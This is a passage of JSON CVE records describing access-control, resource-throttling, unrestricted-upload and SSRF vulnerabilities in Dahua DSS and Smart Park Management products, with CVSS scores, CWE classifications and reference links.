"value": "Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Access Control",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45432",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-14T13:08:12.283Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45431 (GCVE-0-2022-45431)
Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-11 23:07- Improper Access Control
- CWE-284 - Improper Access Control
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.052Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45431",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-11T23:06:20.607432Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284 Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-11T23:07:11.025Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Access Control",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45431",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-11T23:07:11.025Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3836 (GCVE-0-2023-3836)
Vulnerability from cvelistv5 – Published: 2023-07-22 18:00 – Updated: 2024-08-02 07:08- CWE-434 - Unrestricted Upload
| URL | Tags |
|---|---|
| https://vuldb.com/?id.235162 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.235162 | signaturepermissions-required |
| https://github.com/qiuhuihk/cve/blob/main/upload.md | exploit |
| Vendor | Product | Version | |
|---|---|---|---|
| Dahua | Smart Park Management |
Affected:
20230713
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:08:50.600Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.235162"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.235162"
},
{
"tags": [
"exploit",
"x_transferred"
],
"url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Smart Park Management",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "20230713"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "analyst",
"value": "qiuhui (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk passieren. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434 Unrestricted Upload",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-24T06:25:47.211Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.235162"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.235162"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-07-21T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-07-21T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-07-21T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-08-15T21:58:00.000Z",
"value": "VulDB entry last update"
}
],
"title": "Dahua Smart Park Management unrestricted upload"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2023-3836",
"datePublished": "2023-07-22T18:00:05.786Z",
"dateReserved": "2023-07-21T20:50:50.266Z",
"dateUpdated": "2024-08-02T07:08:50.600Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3121 (GCVE-0-2023-3121)
Vulnerability from cvelistv5 – Published: 2023-06-06 11:00 – Updated: 2024-08-02 06:48- CWE-918 - Server-Side Request Forgery
| URL | Tags |
|---|---|
| https://vuldb.com/?id.230800 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.230800 | signaturepermissions-required |
| https://github.com/RCEraser/cve/blob/main/DaHua..md | exploit |
| Vendor | Product | Version | |
|---|---|---|---|
| Dahua | Smart Parking Management |
Affected:
20230528
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:48:07.341Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.230800"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.230800"
},
{
"tags": [
"exploit",
"x_transferred"
],
"url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Smart Parking Management",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "20230528"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "analyst",
"value": "RCEraser (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Dahua Smart Parking Management bis 20230528 wurde eine problematische Schwachstelle gefunden. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /ipms/imageConvert/image. Durch das Beeinflussen des Arguments fileUrl mit unbekannten Daten kann eine server-side request forgery-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 2.7,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-23T12:43:09.475Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.230800"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.230800"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-06-06T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-06-06T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-06-06T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-06-30T14:48:14.000Z",
"value": "VulDB entry last update"
}
],
"title": "Dahua Smart Parking Management image server-side request forgery"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2023-3121",
"datePublished": "2023-06-06T11:00:05.120Z",
"dateReserved": "2023-06-06T10:09:00.185Z",
"dateUpdated": "2024-08-02T06:48:07.341Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45434 (GCVE-0-2022-45434)
Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-14 12:59- Allocation of Resources Without Limits or Throttling
- CWE-770 - Allocation of Resources Without Limits or Throttling
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.035Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45434",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T12:59:05.995633Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T12:59:11.203Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45434",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-14T12:59:11.203Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45433 (GCVE-0-2022-45433)
Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:05- Improper Access Control
- CWE-306 - Missing Authentication for Critical Function
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.038Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45433",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T13:05:16.598801Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-306",
"description": "CWE-306 Missing Authentication for Critical Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T13:05:43.020Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Access Control",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45433",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-14T13:05:43.020Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45431 (GCVE-0-2022-45431)
Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-11 23:07- Improper Access Control
- CWE-284 - Improper Access Control
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.052Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45431",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-11T23:06:20.607432Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284 Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-11T23:07:11.025Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Access Control",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45431",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-11T23:07:11.025Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}